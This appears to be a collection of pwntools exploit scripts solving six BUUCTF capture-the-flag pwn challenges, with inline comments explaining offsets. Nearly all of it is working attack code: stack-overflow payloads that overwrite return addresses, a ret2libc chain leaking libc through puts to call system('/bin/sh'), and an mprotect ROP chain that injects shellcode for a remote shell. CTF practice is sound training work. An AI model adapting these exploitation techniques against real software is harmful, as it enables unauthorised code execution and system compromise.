BUUCTF pwn題exp整合

0x01 rip

from pwn import*

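p = remote('node3.buuoj.cn', 27511)

# 23 bytes of filler reach the saved return address; two addresses follow.
# 0x401198 is returned into first, and 0x401186 is what that returns into.
# What each address is inside the binary is not stated on this page -- check
# with a disassembler before reusing; a wrong offset just crashes the target.
# Bytes literals keep this runnable on Python 3 pwntools, where p64() returns
# bytes and 'a' * 23 (str) + bytes raises TypeError.
payload = b'a' * 23 + p64(0x401198) + p64(0x401186)
p.sendline(payload)

p.interactive()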

0x02 warmup_csaw_2016

from pwn import *

#p = process('./warmup_csaw_2016')
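p = remote('node3.buuoj.cn', 28647)
# The service prints an address after a ':'. The original took the first 8
# bytes of whatever recv() happened to return, which can be a partial read;
# recvn(8) blocks until exactly 8 bytes (e.g. "0x40060d") have arrived.
p.recvuntil(b':')
s = p.recvn(8)
address = int(s, 16)          # int() accepts bytes on Python 3, str on Python 2
# 64 bytes of filler up to the saved return address, then the leaked address.
p.sendline(b'a' * 64 + p64(address))
p.interactive()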

0x03 pwn1_sctf_2016

from pwn import *

#p = process('./pwn1_sctf_2016')
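p = remote('node3.buuoj.cn', 28115)

get_flag = 0x08048F0D


# Twenty 'I' characters plus four 'A' bytes of filler precede the return
# address, which is overwritten with get_flag. Why the filler is split into
# two runs is not explained here -- presumably the binary rewrites its input
# (the 'I' run) before copying it, so keep both runs distinct when adjusting.
# Bytes literals so the concatenation with p32() works on Python 3.
payload = b'I' * 20 + b'A' * 4 + p32(get_flag)
p.sendline(payload)

p.interactive()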

0x04 ciscn_2019_n_1

from pwn import *

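p = remote('node3.buuoj.cn', 26246)
#p = process('./ciscn_2019_n_1')
p.recvuntil(b"umber.\n")
# 0x2C bytes of filler reach the variable being overwritten. 0x41348000 is the
# IEEE-754 single-precision bit pattern of 11.28125; p64() zero-extends it to
# eight bytes, so only the low four bytes carry the value.
p.sendline(b"a" * 0x2C + p64(0x41348000))
p.interactive()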

0x05 [OGeek2019]babyrop

from pwn import *

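# Typo fix: the original wrote `contex`, which raised NameError on this line.
context.log_level = "debug"

# The original never assigned `p` (the process() line was commented out and
# no remote() was given), so every p.send() below failed with NameError.
# Local target by default; swap in remote('host', port) for the live service.
p = process('./babyrop')
elf = ELF('./babyrop', checksec=False)
libc = ELF('./libc.so.6', checksec=False)
addr_main = 0x08048825
plt_puts = elf.plt['puts']
got_puts = elf.got['puts']


def pass_check(tube):
    """Send the nine-byte input the original used to reach the 'Correct' prompt."""
    tube.send(b'\x00' + b'\xff' * 8)
    tube.recvuntil(b'Correct\n')


# Stage 1: 0xeb bytes of filler, then return into puts@plt with main as puts's
# return address and puts@got as its argument -> leaks puts's runtime address.
pass_check(p)
payload = b'a' * 0xeb
payload += p32(plt_puts)
payload += p32(addr_main)
payload += p32(got_puts)
p.send(payload)

# The first four bytes printed are the little-endian pointer to puts in libc.
addr_puts = u32(p.recv(4))
libcbase = addr_puts - libc.sym['puts']
# A libc base that is not page-aligned means the leak or the libc file is
# wrong; stop here rather than send garbage addresses.
if libcbase & 0xfff:
    log.error("libc base %#x is not page-aligned; wrong libc or bad leak" % libcbase)
addr_system = libcbase + libc.sym['system']
# next() instead of the Python-2-only .next() method; bytes pattern for py3.
addr_bin_sh = libcbase + next(libc.search(b'/bin/sh'))

# Stage 2: back in main after the leak, overflow again into system("/bin/sh").
pass_check(p)
payload = b'a' * 0xeb
payload += p32(addr_system)
payload += p32(0)            # fake return address for system()
payload += p32(addr_bin_sh)
p.send(payload)
p.interactive()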

0x06 get_started_3dsctf_2016

from pwn import *

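context(log_level='debug')

#p = process('./pwn')
p = remote('node3.buuoj.cn', 25891)
ret = 0x08048A19               # not used by the chain below; kept from the original


elf = ELF("./pwn")

pop3_ret = 0x80483b8           # named as a pop;pop;pop;ret gadget -- verify in the binary

mem_addr = 0x80EB000           # page-aligned address the shellcode is written to
mem_size = 0x1000
mem_proc = 0x7                 # PROT_READ | PROT_WRITE | PROT_EXEC
read_len = 0x100               # bytes read() pulls into mem_addr

mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']

# ROP chain after 0x38 bytes of filler:
#   mprotect(mem_addr, mem_size, RWX) -> read(0, mem_addr, read_len) -> mem_addr
# pop3_ret follows each call so its three arguments are popped and the next
# frame's return address lines up. Making a page RWX is the whole point here,
# but it is also why a length-checked read matters below.
payload = b'a' * 0x38
payload += p32(mprotect_addr) + p32(pop3_ret) + p32(mem_addr) + p32(mem_size) + p32(mem_proc)
payload += p32(read_addr) + p32(pop3_ret) + p32(0) + p32(mem_addr) + p32(read_len)
payload += p32(mem_addr)
p.sendline(payload)

shellcode = asm(shellcraft.sh(), arch='i386', os='linux')
# sendline() appends '\n'; the whole thing must fit in the read_len bytes the
# read() call accepts, or the tail of the shellcode never lands in memory.
if len(shellcode) + 1 > read_len:
    log.error("shellcode (%d bytes) does not fit in %#x bytes" % (len(shellcode), read_len))
p.sendline(shellcode)

p.interactive()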